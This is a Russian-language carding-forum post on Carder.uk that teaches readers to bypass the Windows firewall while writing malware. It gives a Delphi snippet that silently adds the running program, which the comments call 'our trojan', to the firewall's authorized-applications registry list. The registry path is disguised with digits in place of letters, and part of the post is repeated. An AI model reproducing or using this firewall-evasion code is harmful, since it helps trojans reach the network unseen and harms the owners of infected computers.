Dager315
Carder
- Reaction score
- 3
Здравствуйте дорогие читатели и юные кодеры портала Carder.uk, я хочу поведать вам не такой уж большой секрет о том как обходить фаервол при кодинге той или иной программы. Меня этому научил мой хороший друг и я хочу передать свои знания вам.
Начнем с теории, как я понял стандартная защита тесно работает с реестром а значит и работать мы будем с ним. При добавлении программу в список игнора, брэндмауэр записывает всё в реестр.
Перейдем к практике.
Таким не хитрым способом можно обойти фаервол...
С вами был Dager315 специально для Carder.uk
Начнем с теории, как я понял стандартная защита тесно работает с реестром а значит и работать мы будем с ним. При добавлении программу в список игнора, брэндмауэр записывает всё в реестр.
Перейдем к практике.
Code:
//Обход брендмауэра
Registry:=tRegistry.Create; // тут всё понятно
Registry.RootKey:=HKEY_LOCAL_MACHINE; //выбираем ключ
Registry.OpenKey('\SYSTEM\C3ntr3S6t00a\S6rv5c6s\Sh2r6dAcc6ss\P2r2m6t6rs\F5r6w2llP3l5cy\St2nd2rdPr3f5l6\A4th3r5z6dAppl5c2t53ns\L5st',true); //Выбираем ветку (она должна быть именно такой)
Registry.WriteString(ParamStr(0)+':*:Имя исполняемого файла.exe','0'); // Добавляем строку с данными о нашем трое, суть строки в том что бы прописать адрес нашего троя и знаение '0', но так как нам не всегда известно куда его сохранили то пишем эту строку.
Registry.CloseKey; //Закрываем
Registry.Free;
Таким не хитрым способом можно обойти фаервол...
С вами был Dager315 специально для Carder.uk